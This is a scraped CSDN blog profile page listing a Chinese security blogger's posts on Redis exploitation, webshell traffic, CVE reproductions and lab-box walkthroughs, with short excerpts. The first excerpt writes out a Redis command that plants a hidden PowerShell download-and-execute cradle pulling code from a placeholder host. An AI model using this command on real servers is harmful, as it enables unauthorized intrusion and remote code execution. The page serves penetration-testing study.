白冷
码龄7年
关注
提问 私信
  • 博客:99,074
    99,074
    总访问量
  • 48
    原创
  • 51,086
    排名
  • 1,791
    粉丝
  • 学习成就
IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:北京市
  • 加入CSDN时间: 2017-11-02
博客简介:

qq_40898302的博客

查看详细资料
  • 原力等级
    成就
    当前等级
    5
    当前总分
    1,033
    当月
    28
个人成就
  • 获得173次点赞
  • 内容获得9次评论
  • 获得369次收藏
  • 代码片获得4,335次分享
创作历程
  • 10篇
    2024年
  • 29篇
    2023年
  • 10篇
    2022年
成就勋章
TA的专栏
  • web安全
    6篇
  • 渗透测试
    10篇
  • 打靶
    11篇
创作活动更多

HarmonyOS开发者社区有奖征文来啦!

用文字记录下您与HarmonyOS的故事。参与活动,还有机会赢奖,快来加入我们吧!

0人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

windows环境redis未授权利用手法总结

redis 目标ip:6379>set x "/r/n/r/npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://csip:80/a'))\"/r/n/r/n。也就是说在`c:/windows/system32/wbem/mof/`目录下的mof文件会每5秒自动执行一次,这样就不需要重启机器就能获取权限了。(本地测试一直未成功,写入mof文件夹成功,但是执行一直到bad文件夹里)
转载
发布博客 2024.10.17 ·
55 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

渗透测试中目标主机不出网的解决办法

端口转发和代理隧道是通过已有的主机或服务绕过网络限制。DNS/ICMP隧道和反向Shell则是通过隧道技术创建间接的通信通道。内网横向移动和物理攻击可以帮助我们扩展攻击面,找到新的出网路径或通过物理手段窃取数据。
原创
发布博客 2024.09.06 ·
1091 阅读 ·
7 点赞 ·
0 评论 ·
15 收藏

webshell工具-冰蝎流量特征和加密方式

冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。请求: 3Mn1yNMtoZViV5wotQHPJtwwj (每个连接请求头和响应头都不一样的,但是本次连接以后的请求头和响应头都是固定的) 响应: mAUYLzmqn5QPDkyI5lvSp0fjiBu1e7047Yj。4、服务端收到请求,用Session中的密钥解密请求的Body部分,之后执行Payload,将直接结果返回到客户端。
原创
发布博客 2024.09.06 ·
465 阅读 ·
5 点赞 ·
0 评论 ·
10 收藏

redis未授权getshell整合利用

redis未授权getshell四种方式
原创
发布博客 2024.06.13 ·
1486 阅读 ·
19 点赞 ·
0 评论 ·
9 收藏

webshell工具-冰蝎流量特征和加密方式

冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。而老牌的如中国菜刀因为其流量特征太过明显,从而使用的场景越来越少。
原创
发布博客 2024.05.25 ·
1495 阅读 ·
6 点赞 ·
1 评论 ·
10 收藏

如何将virtualbox导出的ova转换成qcow2

如何将virtualbox导出的ova转换成qcow2
原创
发布博客 2024.04.28 ·
1041 阅读 ·
7 点赞 ·
1 评论 ·
5 收藏

复现 CVE-2020-9548:Jackson-databind

复现 CVE-2020-9548:Jackson-databind
原创
发布博客 2024.03.02 ·
634 阅读 ·
8 点赞 ·
0 评论 ·
7 收藏

python编写的端口扫描脚本

这个参数允许您告诉解析器应该将参数解析为何种数据类型。tgtIP = socket.getaddrinfo(targetHost, 0)[0][4][0] # 获取目标主机的 IP 地址,socket.getaddrinfo(targetHost, 0) 返回一个包含解析信息的列表。parser.add_option('-H', dest='targetHost', type='string', help='specify target host') # add_option() 方法用于添加选项,
原创
发布博客 2024.01.19 ·
828 阅读 ·
9 点赞 ·
0 评论 ·
10 收藏

脏牛漏洞(CVE-2016-5195)复现过程(详细完整版)

KaLi 攻击机Linux靶机 靶场实验目的:掌握漏洞利用的方法掌握脏牛漏洞的原理提高对内核安全性的认识。
原创
发布博客 2024.01.19 ·
1975 阅读 ·
21 点赞 ·
0 评论 ·
23 收藏

docker下载时报错 /usr/local/bin/docker-compose: 1: cannot open html: No such file

docker 下载时报错 /usr/local/bin/docker-compose: 1: cannot open html: No such file。在网上查找了一些解决方法都不对,最后,通过删除/usr/local/bin/docker-compose 文件 重新安装docker 解决问题。
原创
发布博客 2024.01.15 ·
1480 阅读 ·
8 点赞 ·
1 评论 ·
14 收藏

web 安全总结

web安全总结
原创
发布博客 2023.10.17 ·
6364 阅读 ·
1 点赞 ·
0 评论 ·
11 收藏

.Git 仓库敏感信息泄露

Git是由林纳斯·托瓦兹(Linus Torvalds)命名的,它来自英国俚语,意思是“混账”,Git是一个分布式版本控制软件,最初由林纳斯·托瓦兹(Linus Torvalds)创作,于2005年以GPL发布。最初目的是为更好地管理Linux内核开发而设计。Git最初只是作为一个可以被其他前端(比如CoGito或StGit)包装的后端而开发的,但后来Git内核已经成熟到可以独立地用作版本控制。很多著名的软件都使用Git进行版本控制,其中包括Linux内核、X.Org服务器和OLPC内核等项目的开发流程。
原创
发布博客 2023.10.17 ·
330 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Apache HTTPD 换行解析漏洞(CVE-2017-15715)

Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在 一个解析漏洞,在解析PHP时,1.php\x0a将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。影响范围apache :2.4.0~2.4.29版本。
原创
发布博客 2023.10.17 ·
598 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Nginx 解析漏洞

此漏洞环境通过 vulhub 项目启动。
原创
发布博客 2023.10.17 ·
98 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

IIS7.0解析漏洞

IIS7.0解析漏洞。
原创
发布博客 2023.10.17 ·
476 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

Phpstudy(小皮) 搭建的mysql数据库~无法远程连接

最后,执行执行flush privileges;便可以完成设置,开启PHPstudy内所集成mysql的远程连接功能。命令中的两个root分别表示数据库的账号和密码。选中我们一个我们需要连接的数据库。
原创
发布博客 2023.08.28 ·
1386 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Python实现windows自动截图

要在Windows上实现每15秒截图,使用Python编写一个脚本来自动化这个过程。
原创
发布博客 2023.08.24 ·
787 阅读 ·
1 点赞 ·
0 评论 ·
5 收藏

Ripper靶机之内部系统泄漏、Webmin、rips系统等漏洞利用;Metasploit、CVE-2021-3493等使用方法

通过刚才的信息收集可知,系统运行的是Apache服务,Apache默认运行在 /var/www/ 下。通过尝试,发现是cubes 的系统密码是“Il00tpeople”,并成功登录cubes用户。通过rips搜索功能搜索pass,发现存在如下代码,获取了获取了一个账号密码。去尝试用账号密码登录22端口ssh服务,运气不错,登录成功。再次尝试读取系统服务的文件,成功读取了系统服务本身的文件。运行exp,提权成功(在cp前需要给exp执行权限)5.4版本,是一个比较稳定的版本,不存在漏洞。
原创
发布博客 2023.06.06 ·
331 阅读 ·
1 点赞 ·
0 评论 ·
1 收藏

Billu_b0x靶机之SQL注入(SQLMAP跑步出来)、文件包含漏洞、文件上传漏洞、任意文件下载、源码审计、内核漏洞提权

密码文件:/usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt。文件路径:cd /usr/share/webshells/php。在/test目录,将get请求更改为psot。用户名,burp自带的sql模糊测试。尝试上传反弹shell的php文件。目标: 取得 root 权限。启动http服务,让靶机下载。编译输出成二进制文件提权成功。难度: 中(两种攻击路线)万能密码登录匹配成功并登录。文件头部改为:GIF89;上传a.png的图片马。
原创
发布博客 2023.05.18 ·
238 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

hacksudo靶机之(cgi-bin)破壳漏洞弹shell、GTFOBins提权、SQL注入

目标:取得 root 权限 + Flag。当前用户执行thor权限用户的脚本。用nmap去探测是否存在破壳漏洞。强制爆破cgi和sh结尾的文件。利用curl 定义函数执行命令。bash在解析的时候存在漏洞。登录thor并升级shell。用service提权root。查看thor的sudo权限。老版本的bash可以执行。
原创
发布博客 2023.05.18 ·
1027 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏
加载更多